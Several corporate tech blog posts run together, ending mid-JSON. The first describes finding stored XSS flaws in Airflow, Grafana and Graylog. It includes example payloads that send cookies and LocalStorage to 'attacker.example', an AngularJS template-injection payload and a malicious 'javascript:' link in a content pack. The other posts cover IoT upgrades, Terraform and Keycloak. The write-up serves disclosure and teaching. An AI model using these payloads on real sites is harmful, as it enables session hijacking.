In search of XSS vulnerabilities

This is a blog post introducing our Cloud Security team and a few XSS vulnerabilities we have found this year in various open source products.

Our team and what we do

Solita has a lot of security minded professionals working in various roles. We have a wide range of security know-how from threat assessment and secure software development to penetration testing. The Cloud Security team is mostly focused on performing security testing on web applications, various APIs, operating systems and infrastructure.

We understand that developing secure software is hard and do not wish to point fingers at the ones who have made mistakes, as it is not an easy task to keep software free of nasty bugs.

You’re welcome to contact us if you feel that you are in need of software security consultation or security testing.

Findings from Open Source products

Many of the targets that we’ve performed security testing for during the year of COVID have relied on a variety of open source products. Open source products are often used by many different companies and people, but very few of them do secure code review or penetration testing on these products. In general, a lot of people use open source products but only a few give feedback or patches, and this can give a false sense of security. However, we do think that open source projects that are used by a lot of companies have a better security posture than most closed source products.

Nonetheless, we’ve managed to find a handful of vulnerabilities from various open source products and as responsible, ethical hackers, we’ve informed the vendors and their software security teams about the issues.

The vulnerabilities found include e.g. Cross-Site Scripting (XSS), information disclosure and a payment bypass in one CMS plugin. But we’ll keep the focus of this blog post on the XSS vulnerabilities, since these have been the most common.

What is an XSS vulnerability

Cross-site scripting, abbreviated as XSS, is a client-side vulnerability. XSS vulnerabilities allow attackers to inject JavaScript code that gets executed on the victim’s client, usually a browser. Being able to execute JavaScript in a victim’s browser allows attackers, for example, to use the same functionalities on the web site as the victim by riding on the victim’s session. Requests made through an XSS vulnerability also come from the victim’s IP address, allowing the attacker to bypass potential IP blocks.
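
As a minimal illustration (the attacker’s domain and the vulnerable input are made up), a classic proof-of-concept payload simply forwards the victim’s cookies to a server the attacker controls:

<script>
  // Runs in the victim's browser, in the security context of the vulnerable site
  new Image().src = 'https://attacker.example/collect?c=' + encodeURIComponent(document.cookie);
</script>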

All of the following vulnerabilities have been fixed by the vendors and updated software versions are available.

Apache Airflow

Apache Airflow is an open-source workflow management platform that is used by hundreds of companies such as Adobe, HBO, Palo Alto Networks, Quora, Reddit, Spotify, Tesla and Tinder. During one of our security testing assignments, we found that it was possible to trigger a stored XSS in the chart pages.

There are a lot of things you can configure and set in Apache Airflow. Usually we try to inject payloads into every place we can test, and include some random marker text in each payload so that we can later identify which input was manipulated and figure out the root cause of the injection.

In Apache Airflow we found out that one error page did not properly construct the error messages in some misconfiguration cases, which caused the error message to trigger JavaScript. Interestingly, in another place the error message was constructed correctly and the payload did not trigger there. This just shows how hard it is to identify every endpoint where functionality happens. Changing your name to an XSS payload does not usually trigger the most common places where you can see your name, such as your profile and posts, but you should always look for other, less common places you can visit. These uncommon places are usually not as well validated for input, simply because they are used less and people barely remember they exist.


Timeline

15.04.2020 – The vulnerability was found and reported to Apache

20.04.2020 – Apache acknowledged the vulnerability

10.07.2020 – The bug was fixed in update 1.10.11 and assigned CVE-2020-9485

Grafana

Grafana is an open-source platform for monitoring and observability. It is used by thousands of companies globally, including PayPal, eBay, Solita, and our customers. During one of our security testing assignments, we found that it was possible to trigger a stored XSS via the annotation popup functionality.

The product sports all sorts of dashboards and graphs for visualizing the data. One feature of the graphs is the ability to include annotations for the viewing pleasure of other users.

While playing around with some basic content injection payloads, we noticed that it was possible to inject HTML tags into the annotations. These tags would then render when the annotation was viewed. One such tag was the image tag “<img>”, which can be used for running JavaScript via event handlers such as “onerror”. Unfortunately for us, the system had some kind of filtering in place and our malicious JavaScript payloads did not make it through.

While inspecting the DOM and source of the page, looking for a way to bypass the filtering, I noticed that AngularJS templates were in use, as there were references to 'ng-app'. Knowing that naive use of AngularJS can lead to a so-called client-side template injection, I decided to try out a simple payload with an arithmetic operation in it: '{{ 7 * 191 }}'. To my surprise, the payload got triggered and the annotation had the value of the calculation present, 1337!

A mere calculator was not sufficient though, and I wanted to pop that tasty alert window with this newly found injection. There used to be a protective expression sandbox mechanism in AngularJS, but the developers probably grew tired of the never-ending cat-and-mouse game and the sandbox escapes that hackers were coming up with, so they removed the sandbox altogether in version 1.6. As such, the payload '{{constructor.constructor('alert(1)')()}}' did just the trick, and at this point I decided to write a report for the Grafana security team.
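
For reference, here are the two payloads described above as they would be typed into the annotation field, with straight quotes (the rendered blog text shows typographic quotes that won’t work if copy-pasted):

{{ 7 * 191 }}
{{constructor.constructor('alert(1)')()}}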

Timeline

16.04.2020 – The vulnerability was found and reported to the security team at Grafana

17.04.2020 – Grafana security team acknowledged the vulnerability

22.04.2020 – CVE-2020-12052 was assigned to the vulnerability

23.04.2020 – A fix for the vulnerability was released in Grafana version 6.7.3

Graylog

Graylog is an open-source log management platform that is used by hundreds of companies including LinkedIn, Tieto, SAP, Lockheed Martin, and Solita. During one of our security assignments, we were able to find two stored XSS vulnerabilities.

During this assessment we had to dig deep into Graylog’s documentation to see what kinds of things were doable in the UI and how to properly make the magic happen. At one point we found out that it’s possible to generate links from the data Graylog receives, and this is a classic way to gain XSS: inject a payload such as ‘javascript:alert(1)’ into the ‘href’ attribute. This does require the user to interact with the generated link by clicking it, but the JavaScript still executes and the effect of the execution is no less dangerous.

Mika went through Graylog’s documentation and found a feature which allowed one to construct links from the data sources, but couldn’t figure out right away how to generate the data needed to construct such a link. He told me about the link construction and his gut feeling that there would most likely be an XSS vector in there. After a brief moment of tinkering with the data creation, Mika decided to take a small coffee break, mostly because doughnuts were served. During this break I managed to find a way to generate the links correctly and trigger the vulnerability, thus finding a stored XSS in Graylog.



Graylog also supports content packs, and the UI provides a convenient way to install third-party content by importing a JSON file. The content pack developer can provide useful information in the JSON, such as the name, description, vendor, and URL, amongst other things. That last attribute served as a hint of what was coming: would there be a possibility to generate a link from that URL attribute?

Below you can see a snippet of the JSON that was crafted for testing the attack vector.
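
The original screenshot is not reproduced here, but a heavily trimmed, hypothetical content pack illustrating the idea could look roughly like this (the real Graylog content pack format has more required fields; only the url attribute matters for the attack):

{
    "v": 1,
    "name": "Totally Legit Content Pack",
    "summary": "Nothing suspicious here",
    "description": "Content pack used for testing the link rendering",
    "vendor": "ACME Security",
    "url": "javascript:alert(document.domain)",
    "parameters": [],
    "entities": []
}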


Once our malicious content pack was imported into the system, we got a beautiful (and not suspicious at all) link in the UI that executed our JavaScript payload once clicked.


As you can also see from both of the screenshots, we were able to capture the user’s session information with our payloads because it was stored in the browser’s LocalStorage. Storing sensitive information such as the user’s session in LocalStorage is not always such a great idea, as LocalStorage is meant to be readable by JavaScript. Session details in LocalStorage combined with an XSS vulnerability can lead to a nasty session hijacking situation.
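
To illustrate the risk (the receiving domain is made up), once an attacker can execute JavaScript, a payload as small as this is enough to ship the whole LocalStorage contents, session details included, to a server they control:

<script>
  // Copy every LocalStorage key/value pair and send it to an attacker-controlled host
  fetch('https://attacker.example/loot', {
    method: 'POST',
    body: JSON.stringify({ ...localStorage })
  });
</script>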

Timeline

05.05.2020 – The vulnerabilities were found and reported to Graylog security team

07.05.2020 – The vendor confirmed that the vulnerabilities are being investigated

19.05.2020 – A follow-up query was sent to the vendor and they confirmed that fixes are being worked on

20.05.2020 – Fixes were released in Graylog versions 3.2.5 and 3.3.

 

References / Links

Read more about XSS:

https://owasp.org/www-community/attacks/xss/

https://portswigger.net/web-security/cross-site-scripting

 

AngularJS 1.6 sandbox removal:

http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html

 

Fixes / releases:

https://airflow.apache.org/docs/stable/changelog.html

https://community.grafana.com/t/release-notes-v6-7-x/27119

https://www.graylog.org/post/announcing-graylog-v3-3

 

Ye old timey IoT, what was it anyway and does it have an upgrade path?

What were the internet-connected devices of old that collected data? Are they obsolete and in need of complete replacement, or is there an upgrade path for integrating them into data warehouses in the cloud?

Previously on the internet

In the beginning the Universe was created.
This has made a lot of people very angry and been widely regarded as a bad move.

— Douglas Adams in his book “The Restaurant at the End of the Universe”

Then someone had another great idea to create computers, the Internet and the world wide web, and ever since then it’s been a constant stream of all kinds of multimedia content that one might enjoy as a kind of remittance for the previous blunders by the universe. (As these things usually go, some people have regarded these as bad moves as well.)

Measuring the world

Some, however, enjoy a completely different type of content. I am talking about data, of course. This need for understanding and measuring the world around us has been with us ever since the dawn of mankind, but an interconnected worldwide network combined with cheaper and better automation accelerated our efforts massively.

Previously you had to trek to the ends of the earth, usually accompanied by great financial and bodily risk, to try and set up test equipment, or to monitor it with your senses and write down the readings on a piece of paper. But then, suddenly, electronic sensors and other measurement apparatus could be combined with a computer to collect data on-site and warehouse it. (Of course, back then we called a warehouse of data a “database” or a “network drive” and had none of this new age poppycock terminology.)

Things were great; no need any longer to put your snowshoes on and risk being eaten by a vicious polar bear when you could just comfortably sit on your chair next to a desk with a brand new IBM PS/2 on it and check the measurements through this latest invention called the Mosaic web browser, or a VT100 terminal if your department was really old-school. (Oh, those were the days.)

These prototypes of IoT devices were very specialized pieces of hardware for very special use cases for scientists and other rather special types of folk, and no Internet-connected washing machines were in sight, yet. (Oh, in hindsight ignorance is bliss. Is it not?)

The rise of the acronym

First, they used Dual-Tone Multi-Frequency signalling, or DTMF. You put your phone next to the device, pushed a button on it, and the thing would scream an ear-shattering series of audible pulses into your phone, which then relayed them to a computer somewhere. Later, if you were lucky, a repairman would come over and completely disregard the self-diagnostic report your washing machine had just sent over the telephone lines, and usually either fixed the damn thing or made the issue even worse while cursing computers all the way to hell. (Plumbers make bad IT support personnel and vice versa.)

From landlines to wireless

So because of this, and many other reasons, someone had a great idea to network devices like these directly to your Internet connection and cut the middle man, your phone, out of the equation altogether. This made things simpler for everyone. (Except for the poor plumber, who still continued to disregard the self-diagnostic reports.) And everything was great for a while again until, one day, we woke up and there was a legion of decades-old washing machines, TVs, temperature sensors, cameras, refrigerators, ice boxes, video recorders, toothbrushes and a plethora of other “smart” devices connected to the Internet.

The Internet of Things, or IoT for short, describes these devices as a whole and the phenomenon, the age, that created them.

Suddenly it was no longer just a set of specialized hardware for special people that collected data with connected smart devices. Now it was for everybody. (This has, yet again, been regarded as a bad move.) If we look past the obvious security concerns that this craze of connecting every single (useless) thing to the Internet has created, we can also see the benefit. The data flows, and data is the new oil, as the saying goes.

And there is a lot of data

The volume of data collected with all these IoT devices is staggering, and therefore simple daily old-timey FTP transfers of data to a central server are no longer a viable way of collecting it. We have come up with new protocols like REST, WebSockets, and MQTT to ingest real-time streams of new data points into our databases from all of these data-collecting devices.

Eventually, all backend systems were migrated or converted into data warehouses that only accept data via these new protocols and are therefore fundamentally incompatible with the old IoT devices.

What to do? Declare them all obsolete and replace them, or is there something that can be done to extend the lifespan of those devices and keep them useful?

The upgrade path, a personal journey

As an example of an upgrade path, I shall share a personal journey on which I embarked in the late 1990s. At this point in time, it is a macabre exercise in fighting against the inevitable obsolescence, but I have devoted tears, sweat, and countless hours over the years to keep these systems alive, and today’s example is no different. The service in question runs on a minimal budget and with volunteer effort, so heavy doses of ingenuity are required.

Vaisala weather station at Hämeenlinna observatory.
The Vaisala weather station located at the Hämeenlinna observatory is now connected via a Moxa serial server to remote logger software.

 

Even though Finland is located near or partly above the Arctic Circle, there are no polar bears around, except in a zoo. Setting up a Vaisala weather station is not something that will cause a furry meat grinder to release your soul from your mortal coil; no, it is actually quite safe. Due to a few circumstances and happy accidents, it is just what I ended up doing two decades ago when setting up a local weather station service in the city of Hämeenlinna. The antiquated 90s web page design is one of those things I look forward to updating at some point, but today we are talking about what goes on in the background. We talk about data collection.

The old, the garbage and the obsolete

Here, we have the type of equipment that measures and logs data points about the weather conditions at a steady pace. These measurements are then read out by specialized software on a computer placed next to the station, since the communication is just plain old ASCII over a serial connection. The software is old. I mean really old. Actually, I am pretty sure that some of you reading this were not even born back in 1998:

Analysis of text strings inside a binary
The image above shows an analysis of the program called YourVIEW.exe that is used to receive data from this antiquated weather station. It is programmed with LabVIEW version 3.243, which was released back in 1998. This software does not run properly on anything newer than Windows 2000.

This creates a few problematic dependencies; problems that tend to get bigger with passing time.

The first issue is an obvious one: an old and unsupported version of the Windows operating system. No new security patches or software drivers are available, which in any IT scenario is a huge problem, but still a common one in any aging IoT solution.

The second problem is that no new hardware is available. No operating system support means no new drivers, which means no new hardware if the old one breaks down. After a decade of scavenging this and that piece of obsolete computer hardware, pulling together a somewhat functioning PC is a quite daunting task that keeps getting harder every year. People tend to just dispose of their old PCs when buying a new one. The half-life of old PC “obtainium” is really short.

The third challenge: one can’t get rid of Windows 2000 even if one wanted to, since the logging software does not run on anything newer than that. And yes, I tried even black magic, voodoo sacrifices and Wine under Linux, to no avail.

And finally, the data collection itself is a problem: how do you modernize something that uses its own data collection/logging software and integrate it with modern cloud services, when said software was conceived before modern cloud computing even existed?

Path step 1, an intermediate solution

As with any technical problem, investigating it yields several solutions, but most of them are infeasible for one reason or another. In my example case, I came up with a partial solution that later enables me to continue building on top of it. At its core this is a cloud journey, a cloud migration, not much different from those I work on daily with our customers at Solita.

For the first problem, Windows updates, we really can’t do anything without upgrading the Windows operating system to a more recent and supported release, but unfortunately the data logging software won’t run on anything newer than Windows 2000; lift and shift it is, then. The solution is to virtualize the server and bolster the security around the vulnerable underbelly of the system with firewalls and other security tools. This has the added benefit of improving the service SLA thanks to fewer server/workstation hardware failures, network issues and power outages. However, since the weather station communicates over a serial connection (RS232), we also need to somehow virtualize the added physical distance away. There are many solutions, but I chose a Moxa NPort 5110A serial server for this project. Combined with an Internet router capable of creating a secure IPsec tunnel between the cloud and the site, and by using Moxa’s Windows RealCOM drivers, one can securely map the on-site serial port to the remote Windows 2000 virtual server.

How about modernizing the data collection then? Luckily YourVIEW writes the received data points into a CSV file, so it is possible to write a secondary logger in Python that collects those data points into a remote MySQL server as they become available.
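
A minimal sketch of what such a secondary logger could look like, assuming a simple timestamp/temperature/pressure CSV layout and the pymysql library (the file path, database details and column names are made up for illustration):

import csv
import time
import pymysql

# Made-up locations and schema, purely for illustration
CSV_PATH = r"C:\weather\yourview_log.csv"
DB = dict(host="db.example.org", user="logger", password="secret", database="weather")

def follow_csv(path):
    """Yield new CSV rows as YourVIEW appends them to the file."""
    with open(path, newline="") as f:
        f.seek(0, 2)                      # start from the current end of the file
        while True:
            line = f.readline()
            if not line:
                time.sleep(5)             # wait for the next data point
                continue
            yield next(csv.reader([line]))

def insert_row(conn, row):
    # row is expected to look like ["2020-05-01 12:00:00", "14.2", "998.5"]
    with conn.cursor() as cur:
        cur.execute(
            "INSERT INTO observations (observed_at, temperature, pressure) "
            "VALUES (%s, %s, %s)",
            (row[0], row[1], row[2]),
        )
    conn.commit()

if __name__ == "__main__":
    connection = pymysql.connect(**DB)
    for data_row in follow_csv(CSV_PATH):
        insert_row(connection, data_row)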

Path step 2, next steps

What was before a vulnerable and obsolete pile of scavenged parts is still a pile of obsolete junk, but now it has a way forward. Many would have discarded this data collection platform as garbage and thrown it away, but with this example I hope to demonstrate that everything has a migration path, and that with proper lifecycle management your IoT infrastructure investment does not necessarily need to be only a three-year plan; one can expect to gain returns for even decades.

An effort on my part is ongoing to replace the YourVIEW software altogether with a homebrew logger that runs in a Docker container and publishes data with MQTT to the Google Cloud Platform IoT Core. IoT Core together with Google Cloud Pub/Sub forms an unbeatable data ingestion framework. Data can be stored in, for example, Google Cloud SQL and/or exported to BigQuery for additional data warehousing, and finally visualized, for example, in Google Data Studio.
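
A rough sketch of what publishing a data point from that homebrew logger to IoT Core could look like, using the paho-mqtt and PyJWT libraries (the project, region, registry and device IDs are placeholders, and error handling is left out):

import datetime
import json
import ssl
import jwt                       # PyJWT, signs the per-device token
import paho.mqtt.client as mqtt

# Placeholder identifiers, purely for illustration
PROJECT, REGION, REGISTRY, DEVICE = "my-project", "europe-west1", "weather", "hml-station"

def device_jwt():
    # IoT Core authenticates a device with a short-lived JWT signed by its private key
    now = datetime.datetime.utcnow()
    claims = {"iat": now, "exp": now + datetime.timedelta(minutes=60), "aud": PROJECT}
    with open("rsa_private.pem") as key_file:
        return jwt.encode(claims, key_file.read(), algorithm="RS256")

client = mqtt.Client(
    client_id=f"projects/{PROJECT}/locations/{REGION}/registries/{REGISTRY}/devices/{DEVICE}"
)
client.username_pw_set(username="unused", password=device_jwt())
client.tls_set(ca_certs="roots.pem", tls_version=ssl.PROTOCOL_TLSv1_2)
client.connect("mqtt.googleapis.com", 8883)
client.loop_start()

# One observation to the device's telemetry topic, forwarded by IoT Core to Pub/Sub
payload = json.dumps({"observed_at": "2020-05-01T12:00:00Z", "temperature": 14.2})
client.publish(f"/devices/{DEVICE}/events", payload, qos=1)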

Even though I use the term “logger” here, the term “gateway” would be suitable as well. Old systems require interpretation and translation to be able to talk to modern cloud services. Either a commercial solution exists from the hardware vendor, or, as in my case, you have to write one.

Together we are stronger

I would like to think that my very specific example above is unique, but I am afraid it is not. In principle, all integration and cloud migration journeys have their unique challenges.

Luckily, modern partners like Solita, with extensive expertise in cloud platforms such as Google Cloud Platform, Amazon Web Services and Microsoft Azure, as well as in software development, integration, and data analytics, can help a customer tackle these obstacles. Together we can modernize and integrate existing data collection infrastructures, for example on the web, in healthcare, in banking, on the factory floor, or in logistics. Throwing existing hardware or software into the trash and replacing them with new ones is time-consuming, expensive, and sometimes easier said than done. Therefore, carefully planning an upgrade path with a knowledgeable partner might be a better way forward.

Even when considering investing in a completely new data collection solution, integration is usually a requirement at some stage of the implementation, and Solita, together with our extensive partner network, is here to help you.

Share your cloud infra with Terraform modules

Cloud comes with many advantages, and one really nice feature is infrastructure as code (IaC). IaC allows one to manage data centers through definition files instead of physically configuring and setting up resources. A very popular tool for IaC is Terraform.

Terraform is a tool for IaC and it works with multiple clouds. With Terraform, configuration files are run from the developer’s machine or as part of CI/CD pipelines. Terraform allows one to create modules: parts of the infrastructure that can be reused. A module is a container for multiple resources that are used together. Even for simple setups, modules are nice, as one does not need to repeat oneself, but they are especially handy with some of the more resource-heavy setups. For example, setting up even a somewhat simple AWS virtual private cloud (VPC) network can be resource-heavy and somewhat complex to do with IaC. As VPCs are typically set up in a similar fashion, generic Terraform modules can ease these deployments greatly.

Share your work with your team and the world

A nice feature of Terraform modules is that you can fairly easily share them. When using modules, you can source them from multiple different locations such as the local file system, version control repositories, GitHub, Bitbucket, AWS S3 or an HTTP URL. If, and when, you have your configuration files in version control, you can simply point your module’s source to this location. This makes sharing modules across teams handy.
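
For example, one and the same (hypothetical) VPC module could be pulled in from a local path, a shared Git repository or an S3 bucket just by changing the source argument:

# Local path inside the same repository
module "network" {
  source = "./modules/vpc"
}

# Git repository shared across teams (hypothetical URL and tag)
module "network_from_git" {
  source = "git::https://github.com/example-org/terraform-aws-vpc.git?ref=v1.2.0"
}

# Package stored in S3 (hypothetical bucket)
module "network_from_s3" {
  source = "s3::https://s3-eu-west-1.amazonaws.com/example-modules/vpc.zip"
}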

Terraform also has the Terraform Registry, which is an index of publicly shared modules. Here you can share your modules with the rest of the world and really help out fellow developers. Going back to the VPC configuration, you can find really good Terraform modules to help you get started with this. Sharing your own code is really easy, and Terraform has very good documentation about it [1]. What you need is a GitHub repository named according to Terraform’s conventions, with a description, the standard module structure and a version tag. That’s all.

Of course, when sharing you should be careful not to share anything sensitive or environment-specific. Good Terraform Registry modules are typically very generic and self-contained. When sourcing directly from outside locations, it is good to keep in mind that at times they might not be available and your deployments might fail. To overcome this, taking snapshots of the modules you use might be a good idea.

Also, I find it a good practice to have a disable variable in the modules. This way the user of the module can choose whether to deploy the module by setting a single variable. This kind of variable is good to take into consideration from the very beginning, because in many cases it affects all the resources in the module. I’ll explain this with the example below.

Send alarms to Teams channel – example

You start to build an application and early on want to have some monitoring in place. You identify the first key metrics and start thinking about how to notify yourself about them. I run into this problem all the time. I’m not keen on emails, as those seem to get lost and require you to define who to send them to. On the other hand, I really like chats. Teams and Slack give you channels where you can collaborate on the rising issues, and it is easy to add people to the channels.

In AWS, I typically create CloudWatch alarms and route them to one SNS topic. By attaching a simple Lambda function to this SNS topic, one can send the message to Teams, for example. In Teams, you control the message format with Teams cards. I created a simple card that has some information about the alarm and a link to the metric. I found myself doing this over and over again, so I decided to build a Terraform module for it.
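
The Lambda function itself can stay tiny. Here is a hedged sketch of the idea in Python (the environment variable name is my own choice and the card is a plain MessageCard, not necessarily the exact format the published module uses):

import json
import os
import urllib.request

# Hypothetical environment variable holding the Teams incoming webhook URL
WEBHOOK_URL = os.environ["TEAMS_WEBHOOK_URL"]

def handler(event, context):
    # SNS delivers the CloudWatch alarm as a JSON string inside each record
    for record in event["Records"]:
        alarm = json.loads(record["Sns"]["Message"])
        card = {
            "@type": "MessageCard",
            "@context": "https://schema.org/extensions",
            "summary": alarm.get("AlarmName", "CloudWatch alarm"),
            "title": alarm.get("AlarmName", "CloudWatch alarm"),
            "text": alarm.get("NewStateReason", ""),
        }
        request = urllib.request.Request(
            WEBHOOK_URL,
            data=json.dumps(card).encode("utf-8"),
            headers={"Content-Type": "application/json"},
        )
        urllib.request.urlopen(request)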

Here is a simple image of the setup. The Terraform module sets up an SNS topic that in turn triggers a Lambda function. The Lambda function sends all the messages it receives to a Teams channel. The setup is really simple, but handy. All I need to do is route my CloudWatch alarms to the SNS topic that is set up by the module, and I will get notifications to my Teams channel.

Simple image of the module and how it plugs into CloudWatch events and Teams

The module only requires you to give the Teams channel webhook URL where the messages are sent. When you create CloudWatch alarms, you just need to send them to the SNS topic that the module creates. The SNS topic ARN is available as a module output.
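
Using the module could then look roughly like this; note that the variable and output names below are illustrative guesses, so check the registry page for the module’s actual interface:

# Illustrative only, see the registry documentation for the real variable/output names
module "alarm_notification" {
  source      = "aloukiala/alarm-chat-notification/aws"
  webhook_url = var.teams_webhook_url
}

resource "aws_cloudwatch_metric_alarm" "api_errors" {
  alarm_name          = "api-5xx-errors"
  namespace           = "AWS/ApiGateway"
  metric_name         = "5XXError"
  statistic           = "Sum"
  period              = 300
  evaluation_periods  = 1
  threshold           = 1
  comparison_operator = "GreaterThanOrEqualToThreshold"
  alarm_actions       = [module.alarm_notification.sns_topic_arn]
}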

You can now find the Terraform module in the Terraform Registry under the name “alarm-chat-notification” or by following the link in the footer [2]. I hope you find it useful for getting going with alarms.

Disable variable

As I mentioned before, it is a good practice to have a disable variable in the module. Doing this in Terraform is a bit tricky. First, create a variable to control it; in my repo it is called “create” and it is of type boolean, defaulting to true. Now every resource in my module has to have the following line:

count = var.create ? 1 : 0

In Terraform this simply means that if my variable is false, the count is 0 and no resource will be created. Not the most intuitive, but it makes sense. This also means that all the resources will be of a list type. Therefore, if you refer to other resources, you have to do it with a list index, even when you know there is only one element. For example, when my Lambda function refers to its role, it does so by referring to the first element in the list as follows:

aws_iam_role.iam_for_lambda[0].arn

Again this makes sense, and it is good to keep in mind.
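
Putting the pieces together, a trimmed-down sketch of the pattern could look like this (the resource and variable names are illustrative, not necessarily the module’s real ones):

variable "create" {
  description = "Set to false to disable every resource in this module"
  type        = bool
  default     = true
}

resource "aws_iam_role" "iam_for_lambda" {
  count = var.create ? 1 : 0
  name  = "alarm-notification-lambda"
  assume_role_policy = jsonencode({
    Version = "2012-10-17"
    Statement = [{
      Action    = "sts:AssumeRole"
      Effect    = "Allow"
      Principal = { Service = "lambda.amazonaws.com" }
    }]
  })
}

resource "aws_lambda_function" "notifier" {
  count         = var.create ? 1 : 0
  function_name = "alarm-notification"
  runtime       = "python3.8"
  handler       = "index.handler"
  filename      = "lambda.zip"
  role          = aws_iam_role.iam_for_lambda[0].arn   # list reference, hence the [0]
}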

I hope this blog inspires you to create reusable Terraform modules for the world to use. And please, feel free to source the alarm module.

[1] https://www.terraform.io/docs/registry/modules/publish.html
[2] https://registry.terraform.io/modules/aloukiala/alarm-chat-notification/aws/

The author of this blog post is a data engineer who has built many cloud-based data platforms for some of the largest Nordic companies.

How to win friends and influence people by consulting?

By definition consulting is easy: just advise people on how to do things in a wiser manner. But how to keep yourself motivated and your skills up to date in this fast-paced world is a totally different matter!

I have done consulting over the years in several different companies and have gathered a routine that helps achieve the things described in the opening paragraph. Not everyone is cut out for consulting; it requires a special type of person to succeed in it. I am not saying you need to be especially good at particular topics to be able to share your knowledge with your customers.

The first rule of thumb is that you never, never let your skills get old. It does not matter how busy you are. Always, and I mean always, make some time to study and test new things. If you don’t, you will soon be obsolete.

The second rule of consulting 101 is that you need to keep yourself motivated. Once work becomes a chore you lose your “sparkle”, and customers can sense that. If you want to be on top of your game, you need to have that thing which keeps customers coming back to you.

The third rule is that you need to keep your customers happy. Always remember who pays your salary. This should be pretty obvious, though.

The fourth and most important rule is “manage yourself”. This is extremely important in this line of work. It is easy to work too much, sleep too little and eventually have a burnout. Avoiding this takes practice, but it is absolutely necessary in the long run. To avoid working too much you need to know yourself and know which symptoms are signs that you are not well. I need to sleep, eat and exercise to avoid this kind of situation. Just saying “work less” is not always possible, so good physical and mental health is essential.

The consulting business can be a cutthroat line of work where only the strongest survive; some describe it as a meritocracy. But at Solita it is not so black and white. We have balanced the game here quite well.
Of course we need to work and do those billable hours. But we have a bit more leg room, and we aim to be the top house in the Nordics, leaving the leftovers for the B-players to collect.

If you still think you might be cut out for consulting work, give me a call, send a WhatsApp message or contact me by some other means:

Twitter @ToniKuokkanen
IRCnet tuwww
+358 401897586
toni.kuokkanen@solita.fi
https://www.linkedin.com/in/tonikuokkanen/

https://en.wikipedia.org/wiki/How_to_Win_Friends_and_Influence_People 

Integrating AWS Cognito with Suomi.fi and other eIDAS services via a SAML interface

AWS Cognito and Azure AD both support SAML SSO integration but neither supports encryption and signing of SAML messages. Here is a solution for a problem that all European public sector organizations are facing.

At the end of 2018, the Ministry of Finance of Finland set out a policy on how Finnish public sector organizations should treat public cloud environments. To summarize: a “cloud first” strategy. Everybody should use the public cloud, and if they don’t, there must be a clear reason why not. The most typical reason is, of course, classified data. The strategy is an extremely big and clear indication of change regarding how organizations should treat the public cloud nowadays.

To move forward fast, most applications require an authentication solution. In one of my customer projects I was asked to design the AWS cloud architecture for a new solution with a requirement for strong authentication of citizens and public entities. In Finland, public sector organizations can use an authentication service called Suomi.fi (Suomi means Finland) to obtain a trusted identity. It integrates banks and other identity providers into a common platform. The service strictly follows the Electronic Identification, Authentication and Trust Services (eIDAS) standard. Currently, and at least in the short term, Suomi.fi supports only SAML integration.

eIDAS SAML with AWS Cognito – Not a piece of cake

Okay, that’s fine. The plan was to use AWS Cognito as a strong security boundary for the applications, and it supports “the old” SAML integration. But a few hours later I started to say no, why and what. The eIDAS standard requires encrypted and signed SAML messaging. Sounds reasonable. However, I soon found out that AWS Cognito (or, for example, Azure AD) does not support it. My world collapsed for a moment. This was not going to be as easy as I thought.

After I contacted AWS partner services and the Suomi.fi service organization, it was clear that I needed to get my hands dirty and build something for this. At Solita we are used to having open discussions and passing information between projects by word of mouth, so I already knew that there were at least a couple of other projects facing the same problem. They also use AWS Cognito and they also need to integrate with the eIDAS authentication service. This made my journey more fascinating, because I could solve a problem for multiple teams.

Solution architecture

Red Hat JBoss Keycloak is the star of the day

Again, thanks to open discussion, my dear colleague Ari from Solita Health (see how he is doing during this remote work period) pointed out that I should look into a product called Keycloak. After I found out that it is backed by Red Hat JBoss, I knew it has a strong background. Keycloak is a single sign-on solution which supports e.g. SAML integration for the eIDAS service and OpenID Connect for AWS Cognito.

Here is simple reference architecture from the solution account setup (click to zoom):

The solution is built with DevOps practices. There is one Git repository for the Keycloak Docker image and one for the AWS CDK project. The AWS CDK project provisions the components inside the dashed square to the AWS account (and e.g. the CI/CD pipelines, not shown in the picture). The rest is done by each project’s own IaC repository, because it varies too much between projects.

We run Keycloak as a container in the AWS Fargate service, which always has at least two instances running in two availability zones in the region. The Fargate service integrates nicely with the AWS ALB: for example, if one container is not able to answer a health check request, it will not receive any traffic and will soon be replaced by another container automatically.

Multiple Keycloak instances form a cluster. They need to share data with each other over a TCP connection, and Keycloak uses JGroups to form the cluster. In this solution, the Fargate service automatically registers (and deregisters) new containers to the AWS Cloud Map service, which provides DNS interfaces for finding out which instances are up and healthy. Keycloak uses the JGroups “DNS PING” query method to discover the others via Cloud Map DNS records.

The other thing Keycloak clusters need is a database. In this solution we used the AWS Aurora PostgreSQL managed database service.

The login flow

The browser is the key integrating element, because it is redirected multiple times, carrying a payload from one service to another. If you don’t have previous knowledge of how SAML works, check Basics of SAML Auth by Christine Rohacz.

The (simplified) initial login flow is described below. Yep, even though it is hugely simplified, it still has quite a few steps.

  1. The user accesses the URL of the application. The application is protected by an AWS Application Load Balancer, and its listener rule requires the user to have a valid AWS Cognito session. Because the session is missing, the user is redirected to the AWS Cognito domain.
  2. AWS Cognito receives the request, and because no session is found and an identity provider is defined, it forwards the user on to the Keycloak URL.
  3. Keycloak receives the request, and because no session is found and a SAML identity provider is defined, it forwards the user on to the Suomi.fi authentication service with a signed and encrypted SAML AuthnRequest.
  4. After the user has proven his/her identity at the Suomi.fi service, Suomi.fi redirects the user back to the Keycloak service.
  5. Keycloak verifies and extracts the SAML message and its attributes, and forwards the user back to the AWS Cognito service.
  6. AWS Cognito verifies the OpenID Connect message, fetches additional user information from Keycloak using the client secret, and finally redirects the user back to the application’s ALB.
  7. The application’s ALB receives the identity and finally redirects the user back to the original path on the application’s ALB.

Now the user has a session with the application ALB (not with the Keycloak ALB) for several hours.

The application internally receives a few extra headers

The application ALB adds two JWT tokens, via the x-amzn-oidc-accesstoken and x-amzn-oidc-data headers, to each request it sends to the backend. From those headers, the application can easily access information about who is logged in and other details of the user profile in AWS Cognito. These headers are only passed between the ALB and the application.

Here is an example of those headers:

Notice: the data is imaginary, provided by Suomi.fi for testing purposes

x-amzn-oidc-accesstoken: {
    "sub": "765371aa-a8e8-4405-xxxxx-xxxxxxxx",
    "cognito:groups": [
        "eu-west-1_xxxxxx"
    ],
    "token_use": "access",
    "scope": "openid",
    "auth_time": 1591106167,
    "iss": "https://cognito-idp.eu-west-1.amazonaws.com/eu-west-1_xxxxxx",
    "exp": 1591109767,
    "iat": 1591106167,
    "version": 2,
    "jti": "xxxxx-220c-4a70-85b9-xxxxxx",
    "client_id": "xxxxxxx",
    "username": "xxxxxxxxx"
}

x-amzn-oidc-data: {
